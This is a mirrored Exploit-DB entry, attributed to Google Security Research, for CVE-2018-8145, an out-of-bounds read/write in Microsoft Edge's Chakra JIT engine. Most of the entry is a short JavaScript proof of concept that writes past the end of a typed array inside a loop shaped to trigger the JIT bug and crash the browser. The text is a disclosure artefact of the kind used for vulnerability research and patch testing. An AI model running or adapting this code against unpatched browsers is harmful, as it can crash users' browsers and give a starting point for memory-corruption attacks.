- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 45011
- Проверка EDB
-
- Пройдено
- Автор
- GOOGLE SECURITY RESEARCH
- Тип уязвимости
- DOS
- Платформа
- WINDOWS
- CVE
- cve-2018-8145
- Дата публикации
- 2018-07-12
Microsoft Edge Chakra JIT - Out-of-Bounds Reads/Writes
Код:
/*
It seems that this issue is similar to the issue 1429 (MSRC 42111). It might need to refresh the page several times to observe a crash.
PoC:
*/
let arr = new Uint32Array(1000);
for (let i = 0; i < 0x1000000; i++) {
for (let j = 0; j < 1; j++) {
i--;
i++;
}
arr[i] = 0x1234;
}- Источник
- www.exploit-db.com
